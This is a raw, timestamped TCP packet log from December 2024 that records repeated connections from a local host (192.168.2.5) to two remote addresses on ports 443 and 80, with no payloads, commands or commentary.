                                                                        Dec 12, 2024 21:39:18.546372890 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:18.546386003 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.546438932 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.546458960 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.546509027 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.546518087 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.546531916 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.546588898 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.546602011 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.546617031 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.546646118 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.546696901 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.587331057 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:18.587555885 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.587565899 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:18.587584972 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.587591887 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:18.587601900 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.587608099 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:18.587621927 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.587630033 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:18.587640047 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.587650061 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.587654114 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:18.587656021 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:18.587661982 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.587666988 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:18.587683916 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.587690115 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:18.587702990 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.587709904 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:18.587730885 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.587742090 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:18.631331921 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:20.171050072 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:20.171075106 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:20.171180010 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:20.171192884 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:20.171684980 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:20.171717882 CET44349790149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:20.171767950 CET49790443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:20.298099041 CET4978580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:20.299998999 CET4979680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:20.418277025 CET8049785193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:20.418353081 CET4978580192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:20.419811964 CET8049796193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:20.419882059 CET4979680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:20.420048952 CET4979680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:20.540163994 CET8049796193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:21.695813894 CET8049796193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:21.702408075 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:21.702442884 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:21.702522993 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:21.703032017 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:21.703046083 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:21.736653090 CET4979680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:23.068134069 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.068442106 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.069739103 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.069752932 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.070090055 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.071289062 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.071351051 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.071475029 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.071510077 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.071599960 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.071640968 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.071743011 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.071794987 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.071894884 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.071913004 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.071933985 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.071949005 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.071963072 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.071989059 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.071994066 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072002888 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072021961 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072053909 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072058916 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072072029 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072082043 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072088957 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072108030 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072115898 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072145939 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072164059 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072185993 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072204113 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072235107 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072253942 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072276115 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072287083 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072305918 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072314978 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072340012 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072354078 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072361946 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072369099 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072386026 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072392941 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072419882 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072432995 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072474003 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072483063 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072496891 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072504997 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072525024 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072525024 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072545052 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.072568893 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072614908 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072635889 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072645903 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072664976 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072724104 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072737932 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072757959 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.072789907 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.119323969 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.122626066 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.122651100 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.122704983 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.122719049 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.122764111 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.122776031 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.122801065 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.122812033 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.122828007 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.122842073 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.122862101 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.122874022 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.122889996 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.122889996 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.122900009 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.122909069 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.122920990 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.122925997 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:23.122955084 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.122968912 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:23.167334080 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:24.734199047 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:24.734229088 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:24.734350920 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:24.734376907 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:24.734512091 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:24.734821081 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:24.734831095 CET44349802149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:24.734865904 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:24.734894991 CET49802443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:24.819572926 CET4979680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:24.820465088 CET4980980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:24.974415064 CET8049796193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:24.974630117 CET4979680192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:24.975187063 CET8049809193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:24.975322008 CET4980980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:24.975470066 CET4980980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:25.095223904 CET8049809193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:26.254194021 CET8049809193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:26.264117956 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:26.264192104 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:26.264298916 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:26.264967918 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:26.264981985 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:26.300293922 CET4980980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:27.699645042 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.701714039 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.701751947 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.701970100 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.701997042 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702080965 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702097893 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702198029 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702228069 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702234030 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702250004 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702356100 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702383041 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702389002 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702397108 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702475071 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702498913 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702531099 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702543974 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702586889 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702604055 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702611923 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702620029 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702630043 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702636957 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702680111 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702694893 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702727079 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702740908 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702764988 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702784061 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702826023 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702840090 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702872992 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702887058 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702915907 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702927113 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702972889 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702986956 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.702992916 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.702996016 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703016043 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703026056 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703068018 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703082085 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703111887 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703124046 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703171015 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703182936 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703203917 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703217983 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703254938 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703269005 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703320026 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703326941 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703331947 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703335047 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703356981 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703362942 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703404903 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703412056 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703449011 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703459978 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703496933 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703515053 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703546047 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703557014 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703587055 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703598976 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703644037 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703660965 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.703679085 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703732014 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703779936 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703824997 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.703881025 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.747350931 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:27.747580051 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.747622967 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.747649908 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:27.791414022 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:29.651449919 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:29.651472092 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:29.651539087 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:29.651556015 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:29.652241945 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:29.652293921 CET44349814149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:29.652355909 CET49814443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:29.743701935 CET4980980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:29.744996071 CET4982480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:29.864068031 CET8049809193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:29.864157915 CET4980980192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:29.865227938 CET8049824193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:29.865335941 CET4982480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:29.865500927 CET4982480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:29.986166000 CET8049824193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:31.202078104 CET8049824193.122.6.168192.168.2.5
                                                                        Dec 12, 2024 21:39:31.212482929 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:31.212524891 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:31.212598085 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:31.213105917 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:31.213134050 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:31.252271891 CET4982480192.168.2.5193.122.6.168
                                                                        Dec 12, 2024 21:39:32.641040087 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.641119003 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.642786026 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.642798901 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.643045902 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.644332886 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.644368887 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.644468069 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.644496918 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.644578934 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.644610882 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.644702911 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.644740105 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.644824028 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.644843102 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.644857883 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.644866943 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.644874096 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.644879103 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.644936085 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.644946098 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.644957066 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.644970894 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.644973040 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.644980907 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.644999981 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645008087 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.645018101 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645026922 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645030975 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.645037889 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.645118952 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645133018 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.645168066 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645190001 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.645200014 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645206928 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.645224094 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645230055 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.645272017 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645283937 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.645328045 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645359039 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.645378113 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645390987 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.645454884 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645464897 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.645484924 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645494938 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.645509005 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645514011 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.645533085 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645539999 CET44349827149.154.167.220192.168.2.5
                                                                        Dec 12, 2024 21:39:32.645580053 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645627975 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645642042 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645665884 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645711899 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645719051 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645742893 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645782948 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645819902 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645859957 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.645900965 CET49827443192.168.2.5149.154.167.220
                                                                        Dec 12, 2024 21:39:32.691329956 CET44349827149.154.167.220192.168.2.5
